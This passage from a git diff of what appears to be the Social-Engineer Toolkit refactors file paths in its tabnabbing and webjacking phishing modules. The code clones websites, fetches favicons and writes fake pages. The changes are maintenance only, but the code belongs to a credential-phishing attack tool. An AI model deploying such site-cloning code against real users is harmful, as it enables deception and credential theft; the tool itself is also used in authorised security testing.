%s/web_clone;mkdir %s/web_clone/" % (userconfigpath, userconfigpath), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait() # set a quick loop to see what the user wants @@ -349,7 +349,7 @@ if meta_attack == "on": # this checks to see if the MSF payload uses webdav, if so we have to # force port 80 - if os.path.isfile(setdir + "/webdav_enabled"): + if os.path.isfile(userconfigpath + "webdav_enabled"): webdav_enabled = "on" # set this incase msf attack, java applet, and harvester is needed diff --git a/src/webattack/tabnabbing/tabnabbing.py b/src/webattack/tabnabbing/tabnabbing.py index 69ec26bcf..701d36fa9 100644 --- a/src/webattack/tabnabbing/tabnabbing.py +++ b/src/webattack/tabnabbing/tabnabbing.py @@ -18,13 +18,13 @@ for line in fileopen: webjacking_timing = line # grab attack_vector specification -fileopen = open(setdir + "/attack_vector", "r") +fileopen = open(userconfigpath + "attack_vector", "r") for line in fileopen: attack_vector = line.rstrip() # need to see if we created file to trigger multi attack webjacking multi_webjacking = "off" -if os.path.isfile(setdir + "/multi_webjacking"): +if os.path.isfile(userconfigpath + "multi_webjacking"): multi_webjacking = "on" @@ -34,7 +34,7 @@ if check_options("IPADDR=") != 0: ipaddr = check_options("IPADDR=") # pull URL field so we can pull favicon later on -fileopen = open(setdir + "/site.template", "r").readlines() +fileopen = open(userconfigpath + "site.template", "r").readlines() for line in fileopen: match = re.search("URL=", line) if match: @@ -48,12 +48,12 @@ for line in fileopen: # move cloned site to index2.html subprocess.Popen("mv %s/web_clone/index.html %s/web_clone/index2.html" % - (setdir, setdir), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait() + (userconfigpath, userconfigpath), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait() # grab the source and write it out to the cloned directory fileopen = open("src/webattack/tabnabbing/source.js", "r") # write it to dir -filewrite = open(setdir + "/web_clone/source.js", "w") +filewrite = open(userconfigpath + "web_clone/source.js", "w") # loop for line in fileopen: line = line.rstrip() @@ -66,10 +66,10 @@ filewrite.close() if attack_vector == "tabnabbing": # grab favicon favicon = urllib.urlopen("%s/favicon.ico" % (URL)) - output = open(setdir + '/web_clone/favicon.ico', 'wb') + output = open(userconfigpath + '/web_clone/favicon.ico', 'wb') output.write(favicon.read()) output.close() - filewrite1 = open(setdir + "/web_clone/index.html", "w") + filewrite1 = open(userconfigpath + "web_clone/index.html", "w") filewrite1.write( '\n') filewrite1.write("\n") @@ -79,7 +79,7 @@ if attack_vector == "tabnabbing": # define webjacking or multi webjacking here if attack_vector == "webjacking" or multi_webjacking == "on": - filewrite1 = open(setdir + "/web_clone/index.html", "w") + filewrite1 = open(userconfigpath + "web_clone/index.html", "w") filewrite1.write("